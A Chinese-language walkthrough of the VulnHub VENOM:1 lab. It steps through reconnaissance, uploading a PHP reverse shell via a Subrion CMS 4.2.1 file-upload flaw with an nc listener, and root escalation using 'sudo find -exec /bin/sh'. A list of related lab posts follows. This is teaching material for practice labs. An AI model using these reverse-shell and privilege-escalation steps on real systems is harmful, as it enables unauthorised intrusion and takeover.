1.信息收集

输入arp-scan 192.168.239.0/24探测存活的IP

使用nmap对192.168.239.166进行扫描,发现IP端口21、80、139、443、445。

在浏览器上访问http://192.168.239.166/,查看源码发现类似md5加密。

解密md5可以得到为hostinger。

输入enum4linux 192.168.239.166,进行SMB探测,可发现存在nathan、hostinger两个用户。

使用上述两个用户登录ftp,发现hostinger\hostinger可以登录成功,并发现存在hint.txt文件。

使用get hint.txt下载文件,并查看文件可得用户名为dora


解密可知为:E7r9t8@Q#h%Hy+M1234

2.漏洞利用

将venom.box加入/etc/hosts文件中,并访问http://venom.box/panel/,发现为Subrion CMS v4.2.1。

使用searchsploit Subrion CMS搜索发现存在文件上传漏洞

上网查询,可以看到Subrion CMS 4.2.1的上传漏洞为,后缀名可以是phar或pht。

并输入用户名\密码,dora\E7r9t8@Q#h%Hy+M1234登录成功,并上传自己木马。

本地监听nc -lvvp 1234,浏览器访问:http://venom.box/upload/php-reverse-shell.phar,反弹成功。

3.权限提升

切换用户为:hostinger

查看hostinger用户目录下无有用信息。

查看/var/www/html/subrion/backup,下存在.htaccess文件,打开发现类似于密码。

切换nathan用户,发现存在sudo提权,但禁止了su。

执行sudo id发现提权成功。

执行find / -perm -u=s -type f 2>/dev/null,发现存在SUID,find提权。

执行sudo find . -exec /bin/sh ; -quit,提权成功。

vulnhub之VENOM:1相关推荐

  1. Vulnhub靶机:BOREDHACKERBLOG: SOCIAL NETWORK

    靶机地址:BoredHackerBlog: Social Network ~ VulnHub 攻击机 192.168.88.128 靶机   192.168.88.136 端口发现 nmap -p22 ...

  2. 渗透测试靶机搭建_对vulnhub中Android4靶机渗透测试全过程!

    Android4靶机简介 名称:Android4 操作系统:Android v4.4 标志:/data/root/(在此目录中) 等级:初学者. 下载链接:Android4:https://downl ...

  3. Vulnhub靶机渗透之 RAVEN: 1

    目录 Description 网卡信息 信息收集 主机发现 主机存活扫描 端口扫描 网站信息 网站首页 nikto 报告 service 页面 wordpress 渗透过程 SSH 爆破 Hydr 命 ...

  4. [网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)

    这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可 ...

  5. 【Vulnhub靶机系列】DC2

    基本信息 Kali:192.168.61.145 DC2:192.168.61.162 实验过程 在Kali中先进行内网探活 sudo arp-scan --interface eth0 192.16 ...

  6. 【Vulnhub靶机系列】DC1

    基本信息 Kali: 192.168.56.116 DC1: 192.168.56.115 实验过程 先在Kali中使用arp-scan进行主机探活 sudo arp-scan --interface ...

  7. 利用Vulnhub复现漏洞 - JBoss JMXInvokerServlet 反序列化漏洞

    JBoss JMXInvokerServlet 反序列化漏洞 Vulnhub官方复现教程 漏洞原理 复现过程 启动环境 端口设置 浏览器设置 BurpSuit设置 复现漏洞 序列化数据生成 发送POC ...

  8. 靶场练习第二十二天~vulnhub靶场之Momentum-2

    一.准备工作 靶机下载地址:Momentum: 2 ~ VulnHub 1.查看kali的ip 使用命令ifconfig 2.使用nmap命令 nmap 192.168.101.0/24 查看开放的端 ...

  9. 靶场练习第二十五天~vulnhub靶场之Raven-2

    一.准备工作 kali和靶机都选择NAT模式(kali与靶机同网段) 1.靶场环境 下载链接:Raven: 2 ~ VulnHub 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机 ...

最新文章

  1. c++ 数组置0_0基础学习C语言第七章:数组(1)
  2. 如何删除本地分支_如何上传项目到GitHub
  3. 第10章 随机山水画(《Python趣味创意编程》教学视频)
  4. div contenteditable 换行_contenteditable跟style标签可真是天生一对
  5. 坚持写博客,果然有人找吾进行技术合作
  6. win10专业版 命令行窗口运行“wsdl2java”命令,提示系统找不到指定路径
  7. 锐浪报表数据源access_学习锐浪报表之MySQL连接字符串的实际操作步骤汇总
  8. JAVA音乐网站(JAVA毕业设计)
  9. github windows系统监控_windows快速制作U盘启动工具Rufus
  10. 【寒江雪】LookRotation详解
  11. 将洛奇的MML乐谱转为beep(蜂鸣器)乐谱
  12. 《A CMOS Time-to-Digital Converter With BetterThan 10ps Single-Shot Precision》论文阅读
  13. API安全(二):API安全设计原则
  14. 面阵相机该如何选型?
  15. Libuv的安装及运行使用
  16. python输出水仙花数_python打印水仙花数(基础版)
  17. 延迟执行与不可变,系统讲解JavaStream数据处理
  18. SpringBoot启动时报错
  19. 往mysql批量插入datetime
  20. APP漏洞扫描器之本地拒绝服务检测详解

热门文章

  1. 华视电子读卡器web开发_华视电子官方微信公众号电子书架正式上线 - IT业界_CIO时代网...
  2. 五子棋游戏的设计与实现毕业设计(含论文)
  3. 微服务与 SOA的关系
  4. Jena Fuseki启动时 Failed to bind to 0.0.0.0/0.0.0.0:3030 解决办法 —— 修改启动时的端口号
  5. 文心一言 新闻发布会 , 你怎么看这款产品?
  6. 药品生产企业计算机管理,药品生产企业现场检查过程中计算机化管理系统存在的问题及.PDF...
  7. OKI MICROLINE 8100F 打印机驱动
  8. Delphi XE10.3.1 使用心得-2019-12-08
  9. 基于SSM实现的网上订餐系统|点餐餐厅系统
  10. 国家质量基础设施NQI系统开发,NQI一站式服务平台建设